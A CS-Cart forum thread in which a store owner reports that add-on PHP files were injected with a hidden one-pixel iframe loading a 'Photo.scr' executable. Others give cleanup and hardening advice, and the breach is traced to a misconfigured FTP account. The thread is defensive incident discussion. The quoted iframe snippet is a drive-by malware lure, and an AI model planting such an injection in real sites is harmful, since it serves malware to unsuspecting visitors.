Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

My Store Was Hacked! Rate Topic   - - - - -

 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 01:46 AM #1

Hey all, 

 

I was a victim of an attacker although my store is still in the development stage. 

 

While I was trying to access my web store, PHP parse error displayed pointing to a file with a syntax error. It was recently modified and saw an iframe inside it. It is an init.php file belong to one of 3rd party addons. Then realized that all php files for the 2 addons that I have are infected (btw, these addons belong to the same developer). This is the injected code: 

<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>

Appended to the end of each php file of the 2 addons. On the same directory, I can see Photo.scr is there with admin as the owner. (file size is around 2 MB).

 

I am using the latest version of Multivendor. Also, My web server is updated. The following security configurations are also applied: 

 

Firewall

SSL/TLS

No password login allowed (only SSH).

Restricted IPs to some directories. 

 

How do you think the attacker succeeded to upload and change PHP files? 

What are the possible vulnerabilities that the attacker was able to exploit? I am sure this is not related to server login. 

I was always thinking that a server with good conf and complex passwords will never be compromised. Is this not correct? Is it true that any store can be hacked by an experienced hacker regardless of the security procedures applied? 

 

Thank you for your contribution in this so that all of us can enjoy secure CS-Cart/Multi-vendor stores. 



 
  • kogi
  • Senior Member
  • Members
  • Join Date: 16-Aug 07
  • 596 posts

Posted 08 June 2018 - 02:46 AM #2

You might need to find someone who knows what they are doing to check out your server.

 

Because in most cases you just have to look through log files to see how they got in


find / -type f -name '*.base' -exec chown kogi.kogi {} \;

 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 556 posts

Posted 08 June 2018 - 04:36 AM #3

Delete all files, re-upload the CS-Cart files to the server (or make a fresh installation), check the database of suspicious entries. If that is ok, install and configure OWASP ModSecurity Core Rule Set or COMODO ModSecurity Apache Rule Set on the server. This will provide you a real-time protection against many common attack categories, including sql injection, cross site scripting (XSS) attacks, file inclusion etc.


CS-Cart with 1 Year FREE Web Hosting | CS-Cart optimized SSD Cloud VPS Servers from €10.00/month
.
VPS SSD Cloud from €10.00 *** Dedicated Servers *** CS-Cart Authorized Reseller and Web Hosting Provider


 

Posted 08 June 2018 - 05:56 AM #4

Hello!

 

It will also be wise to backup the hacked version of CS-Cart to be able to follow the trace during the investigation. If you just delete and reinstall, the problem will not be revealed and the store will be breached again in the future.

 

So, save the evidence first, then reinstall.


AWS Cloud hosting for CS-Cart and Multi-Vendor

by Simtech Development - CS-Cart certified hosting provider

free installation & migration | free 24/7 server monitoring | free daily backups | free SSL | and more...


 
  • eComLabs
  • CS-Cart Expert
  • Authorized Reseller
  • Join Date: 27-Jan 14
  • 18498 posts

Posted 08 June 2018 - 06:15 AM #5

What Multi-Vendor version do you use?


GET A FREE QUOTE | CS-Cart Add-ons | CS-Cart Licenses | CS-Cart Development | CS-Cart Design | Server Configuration | UniTheme and YOUPI
CS-Cart                USD 345     Multi-Vendor              USD 1250    CS-Cart RU                         24500 руб.
CS-Cart Ultimate  USD 775     CS-Cart + YOUPI      USD 545      CS-Cart RU + UniTheme    36000 руб.


 
  • Darius
  • Douchebag
  • Members
  • Join Date: 20-Apr 08
  • 3221 posts

Posted 08 June 2018 - 06:31 AM #6

Maybe not your site but your PC firstly was infected where you have FTP client with stored passwords..



 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 11:57 AM #7

Delete all files, re-upload the CS-Cart files to the server (or make a fresh installation), check the database of suspicious entries. If that is ok, install and configure OWASP ModSecurity Core Rule Set or COMODO ModSecurity Apache Rule Set on the server. This will provide you a real-time protection against many common attack categories, including sql injection, cross site scripting (XSS) attacks, file inclusion etc.

Thank you Martfox, will read about your recommendations. 

 

Hello!

 

It will also be wise to backup the hacked version of CS-Cart to be able to follow the trace during the investigation. If you just delete and reinstall, the problem will not be revealed and the store will be breached again in the future.

 

So, save the evidence first, then reinstall.

 

So I did Maksim.

 

What Multi-Vendor version do you use?

 

I am using 4.7.3. 

 

Maybe not your site but your PC firstly was infected where you have FTP client with stored passwords..

 

I am thinking of this as well. 

 

 

I will keep  you updated if any vulnerability or server flaw was found. 



 
  • Darius
  • Douchebag
  • Members
  • Join Date: 20-Apr 08
  • 3221 posts

Posted 08 June 2018 - 12:21 PM #8

This has happened to me, was using filezilla ftp client

 

I am thinking of this as well.



 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 08 June 2018 - 12:27 PM #9

This has happened to me, was using filezilla ftp client

 

I never used FTP with password to connect to my store. I used to use filezilla as SFTP with SSH keys. Moreover, I disallowed password authentication. Only SSH key pairs log. 

 

But, I store the private keys on my machine. Also, a copy of local.config.php is also on my machine. So worth investigating this scenario. 



 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11023 posts

Posted 08 June 2018 - 05:36 PM #10

If infection is in only 1 developer's addon, you might check the archive source to see if perchance it was distributed with the malicious  code (I.e. the developer was hacked).  I'm assuming you have privately contacted the developer to advise them of the issue just in case it's a problem on their end.  Either way, the developer should be notified just in case there is some vulnerability in what they distributed (either the injected code itself or some other vulnerability).


EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • alaa
  • Advanced Member
  • Trial users
  • Join Date: 18-Mar 18
  • 69 posts

Posted 17 June 2018 - 01:03 AM #11

Hi, 

 

Just for your info... my server was compromized because of a bad server conf related to our FTP accounts. We did a mistake during Server Setup. The reason why the files of certain addons were hacked is because those third party addons' files were owned by the account which was hacked. This has enabled the attacker to change only those files. 

 

Thank you all for your input. Special thanks to Simtech DevOps team for their contribution. 



 
  • mokeshop
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 990 posts

Posted 17 June 2018 - 10:40 AM #12

addons must go trought somekind validation process before publication on the markeplace



 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11023 posts

Posted 17 June 2018 - 07:14 PM #13

addons must go trought somekind validation process before publication on the markeplace

Why?  This had nothing to do with the addons themselves.  If the addon archives had been extracted/installed via the '+' icon in cs-cart rather than being uploaded via FTP, none of those issues would have happened.  Additionally the description also implies that the practice used would create ownership issues on the site anyway which (depending on what the addon needs to do) could also break that addon. 


EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • mokeshop
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 990 posts

Posted 17 June 2018 - 08:36 PM #14

Why?  This had nothing to do with the addons themselves.  If the addon archives had been extracted/installed via the '+' icon in cs-cart rather than being uploaded via FTP, none of those issues would have happened.  Additionally the description also implies that the practice used would create ownership issues on the site anyway which (depending on what the addon needs to do) could also break that addon. 

 

i was talking about a verification system of addons like they have on presta... the module has to be tested, and verified...here are distrubted addons without a verification. you can put anyting inside an addon



 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 556 posts

Posted 17 June 2018 - 08:46 PM #15

i was talking about a verification system of addons like they have on presta... the module has to be tested, and verified...here are distrubted addons without a verification. you can put anyting inside an addon

 

That's an another story and has nothing to do with the OP issue in this thread.


CS-Cart with 1 Year FREE Web Hosting | CS-Cart optimized SSD Cloud VPS Servers from €10.00/month
.
VPS SSD Cloud from €10.00 *** Dedicated Servers *** CS-Cart Authorized Reseller and Web Hosting Provider